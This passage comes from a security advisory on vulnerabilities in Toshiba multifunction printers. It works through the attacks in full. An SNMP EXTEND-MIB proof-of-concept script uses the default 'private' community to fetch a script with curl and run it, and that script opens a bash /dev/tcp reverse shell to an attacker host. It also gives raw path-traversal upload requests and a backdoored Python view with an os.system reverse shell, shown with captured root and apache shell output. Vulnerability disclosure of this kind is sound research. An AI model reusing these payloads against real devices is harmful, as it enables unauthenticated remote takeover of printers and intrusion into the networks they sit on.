(rw,relatime,errors=continue,user_xattr)<br \/>proc on \/old_root\/proc type proc (rw,relatime)<br \/>\/dev\/sda2 on \/ type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>\/dev\/sda13 on \/platform type ext4<br \/>(rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>proc on \/proc type proc (rw,relatime)<br \/>sysfs on \/sys type sysfs (rw,nosuid,nodev,noexec,relatime)<br \/>none on \/dev type tmpfs (rw,relatime,mode=755)<br \/>ramfs on \/ramdisk type ramfs (rw,relatime,size=100m)<br \/>\/dev\/sda3 on \/rollback type ext4<br \/>(rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>\/dev\/sda5 on \/work type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>\/dev\/sda6 on \/registration type ext4<br \/>(rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>\/dev\/sda7 on \/backup type ext4<br \/>(rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>\/dev\/sda8 on \/imagedata type ext4<br \/>(rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>\/dev\/sda9 on \/application type ext4<br \/>(rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>\/dev\/mapper\/enc_encryption on \/encryption type ext4<br \/>(rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>\/dev\/sda12 on \/storage type ext4<br \/>(rw,relatime,nodelalloc,nobarrier,data=ordered)<br \/>tmpfs on \/dev\/shm type tmpfs (rw,relatime,mode=755)<br \/>devpts on \/dev\/pts type devpts (rw,relatime,mode=600)<br \/>fusectl on \/sys\/fs\/fuse\/connections type fusectl (rw,relatime)<br \/>bash-4.1#<\/p>\n<p>The vulnerability is located inside net-snmpd, as net-snmpd supports<br \/>the `NET-SNMP-EXTEND-MIB` extension MIB.<\/p>\n<p>This extension allows the execution of code from the net-snmpd daemon,<br \/>with root privileges, with 2 steps:<\/p>\n<p>1. Definition of a new MIB;<br \/>2. Execution of the new MIB.<\/p>\n<p>A bash payload is also provided:<\/p>\n<p>This following PoC will download a shell script, save it inside<br \/>`\/dev\/shm\/pwn.sh` and execute it as root on the targeted printer:<\/p>\n<p>kali% cat \/var\/www\/html\/pwn.sh<br \/>#!\/bin\/sh<\/p>\n<p>bash -i &gt;&amp; \/dev\/tcp\/10.0.0.2\/443 0&gt;&amp;1<\/p>\n<p>kali% cat .\/remote-pwn.sh<br \/>#!\/bin\/sh<\/p>\n<p>snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1<br \/>&#8216;nsExtendStatus.&#8221;cmd&#8221;&#8216; = createAndGo &#8216;nsExtendCommand.&#8221;cmd&#8221;&#8216; = \/bin\/sh<br \/>&#8216;nsExtendArgs.&#8221;cmd&#8221;&#8216; = &#8216;-c &#8220;curl http:\/\/10.0.0.2\/pwn.sh -o<br \/>\/dev\/shm\/pwn.sh&#8221;&#8216;<br \/>snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects<br \/>snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1<br \/>&#8216;nsExtendStatus.&#8221;cmd&#8221;&#8216; = createAndGo &#8216;nsExtendCommand.&#8221;cmd&#8221;&#8216; = \/bin\/sh<br \/>&#8216;nsExtendArgs.&#8221;cmd&#8221;&#8216; = &#8216;-c &#8220;chmod 755 \/dev\/shm\/pwn.sh&#8221;&#8216;<br \/>snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects<br \/>snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1<br \/>&#8216;nsExtendStatus.&#8221;cmd&#8221;&#8216; = createAndGo &#8216;nsExtendCommand.&#8221;cmd&#8221;&#8216; = \/bin\/sh<br \/>&#8216;nsExtendArgs.&#8221;cmd&#8221;&#8216; = &#8216; &#8220;\/dev\/shm\/pwn.sh&#8221;&#8216;<br \/>snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects<\/p>\n<p>Using this PoC to get a connect-back root shell:<\/p>\n<p>kali% .\/remote-pwn.sh 10.0.0.1<br \/>NET-SNMP-EXTEND-MIB::nsExtendStatus.&#8221;cmd&#8221; = INTEGER: createAndGo(4)<br \/>NET-SNMP-EXTEND-MIB::nsExtendCommand.&#8221;cmd&#8221; = STRING: \/bin\/sh<br \/>NET-SNMP-EXTEND-MIB::nsExtendArgs.&#8221;cmd&#8221; = STRING: -c &#8220;curl<br \/>http:\/\/10.0.0.2\/pwn.sh -o \/dev\/shm\/pwn.sh&#8221;<br \/>NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 21<br \/>NET-SNMP-EXTEND-MIB::nsExtendCommand.&#8221;cmd&#8221; = STRING: \/bin\/sh<br \/>NET-SNMP-EXTEND-MIB::nsExtendArgs.&#8221;cmd&#8221; = STRING: -c &#8220;curl<br \/>http:\/\/10.0.0.2\/pwn.sh -o \/dev\/shm\/pwn.sh&#8221;<br \/>NET-SNMP-EXTEND-MIB::nsExtendInput.&#8221;cmd&#8221; = STRING:<br \/>NET-SNMP-EXTEND-MIB::nsExtendCacheTime.&#8221;cmd&#8221; = INTEGER: 5<br \/>NET-SNMP-EXTEND-MIB::nsExtendExecType.&#8221;cmd&#8221; = INTEGER: exec(1)<br \/>NET-SNMP-EXTEND-MIB::nsExtendRunType.&#8221;cmd&#8221; = INTEGER: run-on-read(1)<br \/>NET-SNMP-EXTEND-MIB::nsExtendStorage.&#8221;cmd&#8221; = INTEGER: volatile(2)<br \/>NET-SNMP-EXTEND-MIB::nsExtendStatus.&#8221;cmd&#8221; = INTEGER: active(1)<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutput1Line.&#8221;cmd&#8221; = STRING: % Total<br \/>% Received % Xferd Average Speed Time Time Time Current<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutputFull.&#8221;cmd&#8221; = STRING: % Total<br \/>% Received % Xferd Average Speed Time Time Time Current<br \/>Dload Upload Total Spent<br \/>Left Speed<br \/>100 53 100 53 0 0 53 0 0:00:01 &#8211;:&#8211;:&#8211;<br \/>0:00:01 114<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutNumLines.&#8221;cmd&#8221; = INTEGER: 3<br \/>NET-SNMP-EXTEND-MIB::nsExtendResult.&#8221;cmd&#8221; = INTEGER: 0<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutLine.&#8221;cmd&#8221;.1 = STRING: % Total<br \/>% Received % Xferd Average Speed Time Time Time Current<br \/>NET-SNMP-EXTEND-MIB::nsExtendOutLine.&#8221;cmd&#8221;.2 = STRING:<br \/>Dload Upload Total Spent Left Speed<br \/>100 53 100 53 0 0 53 0 0:00:01 &#8211;:&#8211;:&#8211;<br \/>0:00:01 114<br \/>Error in packet.<br \/>Reason: inconsistentValue (The set value is illegal or unsupported<br \/>in some way)<br \/>Failed object: NET-SNMP-EXTEND-MIB::nsExtendStatus.&#8221;cmd&#8221;<br \/>NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 21<br \/>NET-SNMP-EXTEND-MIB::nsExtendStatus.&#8221;cmd&#8221; = INTEGER: createAndGo(4)<br \/>NET-SNMP-EXTEND-MIB::nsExtendCommand.&#8221;cmd&#8221; = STRING: \/bin\/sh<br \/>NET-SNMP-EXTEND-MIB::nsExtendArgs.&#8221;cmd&#8221; = STRING: &#8220;\/dev\/shm\/pwn.sh&#8221;<br \/>caTimeout: No Response from 10.0.0.1<\/p>\n<p>And the connect-back shell script will connect to 10.0.0.2 on port<br \/>443\/tcp, as defined in the previous `pwn.sh` script:<\/p>\n<p>kali# nc -l -v -p 443<br \/>listening on [any] 443 &#8230;<br \/>10.0.0.1: inverse host lookup failed: Unknown host<br \/>connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 36464<br \/>bash-4.1# uname -ap<br \/>Linux MFP14144292 3.10.38-ltsi-WR6.0.0.11_standard #3513 SMP Tue<br \/>Jul 5 09:58:22 IST 2022 i686 GNU\/Linux<br \/>bash-4.1# id<br \/>uid=0(root) gid=2000(trusted) groups=0(root)<br \/>bash-4.1#<\/p>\n<p>We can also review the configuration file located at<br \/>`\/encryption\/al\/network\/config\/snmpd.conf`, containing the default<br \/>communities:<\/p>\n<p>bash-4.1# grep -v &#8216;^#&#8217; \/encryption\/al\/network\/config\/snmpd.conf<br \/>rocommunity public<\/p>\n<p>rocommunity6 public<\/p>\n<p>rwcommunity private<\/p>\n<p>rwcommunity6 private<\/p>\n<p>com2sec udp 0.0.0.0\/24 public<\/p>\n<p>view all included .1 80<br \/>view generaluser_view excluded .1<br \/>view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.23.2.1.3<br \/>view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.21.4.1.3<br \/>view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.21.4.1.4<\/p>\n<p>access udpGroup &#8220;toshibaAmerica&#8221; v1 noauth<br \/>exact all all none<br \/>access admin_priv_group &#8220;&#8221; usm priv<br \/>prefix all all none<br \/>access admin_auth_group &#8220;&#8221; usm auth<br \/>prefix all all none<br \/>access generaluser_priv_group &#8220;&#8221; usm priv<br \/>prefix all generaluser_view none<br \/>access generaluser_auth_group &#8220;&#8221; usm auth<br \/>prefix all generaluser_view none<\/p>\n<p>trapcommunity public<\/p>\n<p>dlmod mibs_impl<br \/>\/home\/SYSROM_SRC\/lib\/libalmibs_impl.so<\/p>\n<p>master off<\/p>\n<p>agentaddress udp:161,udp6:161<\/p>\n<p>authtrapenable 1<\/p>\n<p>maxGetbulkRepeats 20<\/p>\n<p>maxGetbulkResponses 100bash-4.1#<\/p>\n<p>SNMP is also exposed over IPv6.<\/p>\n<p>## Details &#8211; Pre-authenticated Remote Code Execution as root or apache<br \/>and multiple Local Privilege Escalations<\/p>\n<p>Toshiba printers provide several ways to upload files using the web interface.<\/p>\n<p>By default, this web interface is reachable without authentication.<\/p>\n<p>For example, using the e-filing web interface, freely reachable using<br \/>http:\/\/ip:8080\/?MAIN=EFILING, we can upload documents:<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>It is possible to upload a document:<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>The uploaded file will be stored inside the printer in the<br \/>\/work\/al\/tmp\/upload\/ directory, inside a directory named by the<br \/>current session.<\/p>\n<p>bash-4.1# find \/work\/al\/tmp\/upload<br \/>\/work\/al\/tmp\/upload<br \/>\/work\/al\/tmp\/upload\/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab<br \/>\/work\/al\/tmp\/upload\/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab\/test3.txt<br \/>\/work\/al\/tmp\/upload\/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab\/test1.txt<br \/>\/work\/al\/tmp\/upload\/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab\/test2.txt<br \/>bash-4.1# ls -latrR \/work\/al\/tmp\/upload<br \/>\/work\/al\/tmp\/upload:<br \/>total 12<br \/>drwxr-xr-x 7 root lp 4096 Mar 24 05:35 ..<br \/>drwx&#8212;&#8212; 2 apache trusted 4096 Mar 24 05:43<br \/>ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab<br \/>drwxrwxrwx 3 root trusted 4096 Mar 24 05:46 .<\/p>\n<p>\/work\/al\/tmp\/upload\/ContentWebServer_10.0.0.2.f54c69d5d2b1963325041644084615ab:<br \/>total 20<br \/>-rw-rw-rw- 1 apache trusted 8 Mar 24 05:41 test1.txt<br \/>-rw-rw-rw- 1 apache trusted 9 Mar 24 05:42 test2.txt<br \/>-rw-rw-rw- 1 apache trusted 9 Mar 24 05:43 test3.txt<br \/>drwx&#8212;&#8212; 2 apache trusted 4096 Mar 24 05:43 .<br \/>drwxrwxrwx 3 root trusted 4096 Mar 24 05:46 ..<br \/>bash-4.1#<\/p>\n<p>This current session is provided by the printer when visiting the web<br \/>interface without authentication.<\/p>\n<p>An attacker can replay the HTTP request with a valid session obtained<br \/>while browsing http:\/\/ip\/?MAIN=EFILING without authentication, and<br \/>change the path to the uploaded file. This path will then be used to<br \/>store the file inside the remote printer.<\/p>\n<p>For example, with a `Name` variable set to<br \/>`\/.\/..\/..\/..\/..\/..\/home\/SYSROM_SRC\/sbin\/malicious.program`, the<br \/>uploaded file is correctly written into<br \/>`\/home\/SYSRM_SRC\/sbin\/malicious.program` inside the printer.<\/p>\n<p>The HTTP request will be:<\/p>\n<p>POST \/contentwebserver\/upload HTTP\/1.1<br \/>Host: 10.0.0.1:8080<br \/>User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:102.0)<br \/>Gecko\/20100101 Firefox\/102.0<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate<br \/>Content-Type: multipart\/form-data;<br \/>boundary=&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;12552735029913057752829397207<br \/>Content-Length: 1011<br \/>Origin: http:\/\/10.0.0.1:8080<br \/>Connection: close<br \/>Referer: http:\/\/10.0.0.1:8080\/efiling\/UploadArchive.html?v=1517352288ta<br \/>Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US;<br \/>pageTrack=MAIN%3DDEVICE;<br \/>Session=10.0.0.2.c8a776a2c87613d78cbb94c558269c61;<br \/>IgnoreSessionTimeout=3<br \/>Upgrade-Insecure-Requests: 1<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;12552735029913057752829397207<br \/>Content-Disposition: form-data; name=&#8221;formSubmitCompleteEventHandler&#8221;<\/p>\n<p>frames[1].formSubmitComplete<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;12552735029913057752829397207<br \/>Content-Disposition: form-data; name=&#8221;DeviceInformationModel&#8221;<\/p>\n<p>&lt;DeviceInformationModel&gt;&lt;Command&gt;&lt;Move&gt;&lt;commandNode&gt;FileStorages&lt;\/commandNode&gt;&lt;Params&gt;&lt;source&gt;&lt;File&gt;test.txt&lt;\/File&gt;&lt;name&gt;Upload&lt;\/name&gt;&lt;\/source&gt;&lt;destination&gt;&lt;name&gt;DataImport&lt;\/name&gt;&lt;\/destination&gt;&lt;\/Params&gt;&lt;\/Move&gt;&lt;\/Command&gt;&lt;\/DeviceInformationModel&gt;<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;12552735029913057752829397207<br \/>Content-Disposition: form-data; name=&#8221;CsrfpId&#8221;<\/p>\n<p>10.0.0.2.c8a776a2c87613d78cbb94c558269c61<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;12552735029913057752829397207<br \/>Content-Disposition: form-data;<br \/>name=&#8221;\/.\/..\/..\/..\/..\/..\/home\/SYSROM_SRC\/sbin\/malicious.program&#8221;;<br \/>filename=&#8221;test.txt&#8221;<br \/>Content-Type: text\/plain<\/p>\n<p>MALICIOUS_CONTENT_WRITTEN_INTO_THE_HARD_DISK<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;12552735029913057752829397207&#8211;<\/p>\n<p>Burp Request:<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>And the file is correctly written into<br \/>`\/home\/SYSRM_SRC\/sbin\/malicious.program` inside the printer:<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>This vulnerability can be used to get Remote Code Executions using<br \/>several different ways. Due to some weaknesses found in Toshiba<br \/>printers, there are hundreds different ways to get Remote Code<br \/>Execution. For example:<\/p>\n<p>* Upload of a malicious library defined in the LD_PRELOAD variable:<br \/>* \/ramdisk\/al\/libGetNameInfoInterface.so or<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so can be overwritten by a<br \/>malicious library<br \/>* Upload of a malicious library using the LD_LIBRARY_PATH variable &#8211;<br \/>An attacker can upload malicious libraries inside:<br \/>* \/home\/SYSROM_SRC\/build\/release\/lib,<br \/>* \/mfp\/lib,<br \/>* \/home\/SYSROM_SRC\/NoBuildItems\/common\/lib,<br \/>* \/home\/SYSROM_SRC\/build\/thirdparty\/plugins\/platforminputcontexts\/,<br \/>* \/home\/SYSROM_SRC\/build\/release\/lib.<br \/>* Upload of a malicious program due to insecure permissions:<br \/>* As shown in Local Privilege Escalation and Remote Code Execution<br \/>using insecure permissions for 106 programs, a lot of programs running<br \/>as root can be overwritten due to insecure permissions (777)<br \/>* Upload a malicious Python program or a malicious Python library<br \/>* &#8230;<\/p>\n<p>This lack of protection can be found in several HTML forms when using<br \/>the printer, without administrative privileges. For example, the page<br \/>at http:\/\/10.0.0.1:8080\/Administration\/maintenance\/uploadsoft\/DriverCustomize.html<br \/>allows uploading any file:<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>It is mandatory to inject a `&lt;INPUT TYPE=SUBMIT&gt;` in the server<br \/>response using Burp or to directly generate such request to upload any<br \/>file.<\/p>\n<p>An example is shown below on how to get Remote Code Execution using<br \/>the upload of a malicious Python script in the next section, using the<br \/>following request:<\/p>\n<p>POST \/contentwebserver\/upload HTTP\/1.1<br \/>Host: 10.0.0.1:8080<br \/>User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:102.0)<br \/>Gecko\/20100101 Firefox\/102.0<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate<br \/>Content-Type: multipart\/form-data;<br \/>boundary=&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;394285998421640844852768059947<br \/>Content-Length: 1126<br \/>Origin: http:\/\/10.0.0.1:8080<br \/>Connection: close<br \/>Referer: http:\/\/10.0.0.1:8080\/Administration\/maintenance\/uploadsoft\/DriverCustomize.html<br \/>Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US;<br \/>pageTrack=MAIN%3DDEVICE; clicked=0; addrLastVisited=ADDRBK;<br \/>IgnoreSessionTimeout=1;<br \/>Session=10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c<br \/>Upgrade-Insecure-Requests: 1<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;394285998421640844852768059947<br \/>Content-Disposition: form-data; name=&#8221;formSubmitCompleteEventHandler&#8221;<\/p>\n<p>frames[0].formSubmitCompleteUploadList<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;394285998421640844852768059947<br \/>Content-Disposition: form-data; name=&#8221;DeviceInformationModel&#8221;<\/p>\n<p>&lt;DeviceInformationModel&gt;&lt;GetValue&gt;&lt;eFiling&gt;&lt;View&gt;&lt;BoxList\/&gt;&lt;\/View&gt;&lt;\/eFiling&gt;&lt;\/GetValue&gt;&lt;Command&gt;&lt;GetEFilingBoxes&gt;&lt;commandNode&gt;eFiling\/BoxList&lt;\/commandNode&gt;&lt;Params&gt;&lt;responseXpath<br \/>contentType=&#8217;XPath&#8217;&gt;eFiling\/View\/BoxList&lt;\/responseXpath&gt;&lt;curPage<br \/>contentType=&#8217;Value&#8217;&gt;1&lt;\/curPage&gt;&lt;pageSize<br \/>contentType=&#8217;Value&#8217;&gt;200&lt;\/pageSize&gt;&lt;definedBox<br \/>contentType=&#8217;Value&#8217;&gt;true&lt;\/definedBox&gt;&lt;\/Params&gt;&lt;\/GetEFilingBoxes&gt;&lt;\/Command&gt;&lt;\/DeviceInformationModel&gt;<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;394285998421640844852768059947<br \/>Content-Disposition: form-data; name=&#8221;CsrfpId&#8221;<\/p>\n<p>10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;394285998421640844852768059947<br \/>Content-Disposition: form-data; name=&#8221;test.txt&#8221;; filename=&#8221;test.txt&#8221;<br \/>Content-Type: text\/plain<\/p>\n<p>test<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;394285998421640844852768059947&#8211;<\/p>\n<p>And the file is correctly uploaded into the printer:<\/p>\n<p>bash-4.1# ls -la<br \/>\/work\/al\/tmp\/upload\/ContentWebServer_10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c\/<br \/>total 12<br \/>drwx&#8212;&#8212; 2 apache trusted 4096 May 27 19:34 .<br \/>drwxrwxrwx 3 root trusted 4096 May 27 19:30 ..<br \/>-rw-rw-rw- 1 apache trusted 5 May 27 19:34 test.txt<br \/>bash-4.1# cat<br \/>\/work\/al\/tmp\/upload\/ContentWebServer_10.0.0.2.5fb38c36e6e15dbe77652121b3d85e0c\/test.txt<br \/>test<br \/>bash-4.1#<\/p>\n<p>We can find several webpages allowing exploiting the vulnerable<br \/>`\/contentwebserver\/upload` API.<\/p>\n<p>It was determined that these webpages are using the insecure<br \/>`\/contentwebserver\/upload` API. They can be used by any attacker to<br \/>upload any file into the printers:<\/p>\n<p>&#8211; &#8211; http:\/\/printer-ip\/efiling\/UploadFrame.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/efiling\/UploadArchive.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/efiling\/UploadFrame.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/efiling\/UploadArchiveProgress.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/efiling\/UpLoadArchiveClose.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/efiling\/UploadArchiveButton.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Registration\/AddressBook\/AddrImport.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Registration\/AddressBook\/AddrImportListFrame.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/DriverCustomize.html<br \/>&#8211; &#8211; &#8230;<\/p>\n<p>Some of these files are directly reachable without authentication<br \/>(e.g. Registration or efiling) and can be found without an admin<br \/>account.<\/p>\n<p>### Remote Code Execution &#8211; Upload of a new .py module inside WSGI<br \/>Python programs<\/p>\n<p>Some of the APIs and web interfaces of the printers are written in Python.<\/p>\n<p>Since the permissions of these Python scripts inside the printers are<br \/>insecure, a backdoored version of the<br \/>`\/registration\/al\/TopAccessPy\/server\/screenfacade\/appmgmt\/views.py`<br \/>has been uploaded as shown below:<\/p>\n<p>Content of `\/registration\/al\/TopAccessPy\/server\/screenfacade\/appmgmt\/views.py`<br \/>with a malicious payload added on line 25:<\/p>\n[code:python]1 #! \/usr\/bin\/env python<br \/>2 # -*- coding: utf-8 -*-<br \/>3 import sys<br \/>4 import os<br \/>5 from pyramid.view import view_config<br \/>6 from pyramid.exceptions import HTTPForbidden<br \/>7 from pyramid.response import Response,FileResponse<br \/>8 from server.screenfacade.appmgmt.applicationmanager import<br \/>applicationManagementModel<br \/>9 import logging<br \/>10 import json<br \/>11 import pyeapicore<br \/>12<br \/>13 sys.path.append(&#8216;\/home\/SYSROM_SRC\/lib&#8217;)<br \/>14<br \/>15 log = logging.getLogger(&#8220;server&#8221;)<br \/>16<br \/>17 @view_config(route_name=&#8217;get_app_list_deployed&#8217;, xhr=True, renderer=&#8217;jsonp&#8217;)<br \/>18 def get_app_list_deployed(request):<br \/>19 log.warning(&#8220;++++++++++++++++++++++++++++++++&#8221;)<br \/>20 log.warning(&#8220;get app list Views : Start &#8220;)<br \/>21 SessionID = &#8221;<br \/>22 session = &#8216; &#8216;<br \/>23 csrfpId = &#8221;<br \/>24 browserLang = &#8221;<br \/>25 os.system(&#8220;bash -i &gt;&amp; \/dev\/tcp\/10.0.0.2\/21 0&gt;&amp;1&#8221;)<br \/>26<br \/>27 if &#8216;SessionID&#8217; in request.cookies:<br \/>28 SessionID = request.cookies[&#8216;SessionID&#8217;]29 if &#8216;Session&#8217; in request.cookies:<br \/>30 session = request.cookies[&#8216;Session&#8217;]31 if &#8216;csrfpId&#8217; in request.headers:<br \/>32 csrfpId = request.headers[&#8216;csrfpId&#8217;]33 if &#8216;BrowserLang&#8217; in request.cookies:<br \/>34 browserLang = request.cookies[&#8216;BrowserLang&#8217;]35<br \/>36 log.info(&#8216;Session ID obtained from request :&#8217; + SessionID)<br \/>37 log.info(&#8216;csrfpId obtained from request:&#8217; + csrfpId)<br \/>38 validationMap = True<br \/>39<br \/>40 if validationMap[&#8216;VALIDATION_STATUS&#8217;] == &#8216;PASSED&#8217;:<br \/>41 log.info(&#8216;User Validation : SUCCESS&#8217;)<br \/>42 data = applicationManagementModel.getAppList(browserLang)<br \/>43 log.warning(&#8220;get app list Views : End &#8220;)<br \/>44 log.warning(&#8220;++++++++++++++++++++++++++++++++&#8221;)<br \/>45 return json.dumps(data)<br \/>46 else:<br \/>47 log.info(&#8216;User Validation : FAILURE&#8217;)<br \/>48 log.warning(&#8220;get app list Views : End &#8220;)<br \/>49 if &#8220;HTTP_REQUEST_FORBIDDEN&#8221; in validationMap:<br \/>50 return HTTPForbidden(&#8220;Error 403 : Forbidden Request&#8221;)<br \/>51 else:<br \/>52 return json.dumps(validationMap)<br \/>53<br \/>54 @view_config(route_name=&#8217;start_background_application&#8217;, xhr=True,<br \/>renderer=&#8217;jsonp&#8217;)<br \/>55 def start_background_application(request):<br \/>56 log.warning(&#8220;++++++++++++++++++++++++++++++++&#8221;)<br \/>57 log.warning(&#8220;start background app : Start &#8220;)<br \/>[&#8230;][\/code]\n<p>Due to some reverse proxy rules and check before this API can be<br \/>reached, this Python code is reachable using the API path<br \/>`http:\/\/printerip\/tapy\/server\/appmgmt\/applistDeployed` with a cookie<br \/>previously provided by the printer when visiting http:\/\/printerip\/<br \/>(without authentication).<\/p>\n<p>When sending a HTTP request to<br \/>`http:\/\/printerip\/tapy\/server\/appmgmt\/applistDeployed`, the attacker<br \/>will receive a connect-back shell from the printer:<\/p>\n<p>kali# nc -l -v -p 21<br \/>listening on [any] 21 &#8230;<br \/>10.0.0.1: inverse host lookup failed: Unknown host<br \/>connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 37243<br \/>[apache@MFP14144292 \/]$ id<br \/>uid=1000(apache) gid=2000(trusted) groups=2000(trusted)<br \/>[apache@MFP14144292 \/]$ uname -ap<br \/>Linux MFP14144292 3.10.38-ltsi-WR6.0.0.11_standard #3513 SMP Tue<br \/>Jul 5 09:58:22 IST 2022 i686 GNU\/Linux<br \/>[apache@MFP14144292 \/]$<\/p>\n<p>Connect-back shell as apache:<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>### Remote Code Execution &#8211; Upload of a new .ini configuration files<br \/>inside WSGI Python programs<\/p>\n<p>It is possible to overwrite the .ini configuration file used by WSGI<br \/>Python programs. This technique is public as of 2023-02-28:<br \/>https:\/\/blog.doyensec.com\/2023\/02\/28\/new-vector-for-dirty-arbitrary-file-write-2-rce.html.<\/p>\n<p>Apache is running with WSGI configurations:<\/p>\n<p>bash-4.1# ps auxww | grep apache<br \/>apache 1611 0.0 0.1 1264444 3708 ? Sl 10:37 0:00<br \/>\/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker -f<br \/>\/encryption\/al\/network\/config\/httpd-prox.conf -k start<br \/>apache 1822 0.2 3.6 483056 108852 ? Sl 10:37 1:02<br \/>(wsgi:webpanel) -f<br \/>\/encryption\/al\/network\/config\/httpd-wsgi.conf -k start<br \/>apache 1823 0.0 2.1 270952 64172 ? Sl 10:37 0:05<br \/>(wsgi:topaccesspy) -f<br \/>\/encryption\/al\/network\/config\/httpd-wsgi.conf -k start<br \/>apache 1824 0.0 0.1 285148 4452 ? Sl 10:37 0:00<br \/>\/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker -f<br \/>\/encryption\/al\/network\/config\/httpd-wsgi.conf -k start<\/p>\n<p>The Python scripts running as WSGI are configured with specific .ini<br \/>configuration files:<\/p>\n<p>&#8211; &#8211; `\/registration\/al\/WebPanel\/development.ini`<br \/>&#8211; &#8211; `\/registration\/al\/TopAccessPy\/development.ini`<\/p>\n<p>Unfortunately, these configuration files can be rewritten because of<br \/>insecure permissions, allowing a remote attacker to execute commands,<br \/>as described in recent public research.<\/p>\n<p>These files have insecure permissions as shown below:<\/p>\n<p>bash-4.1# ls -la 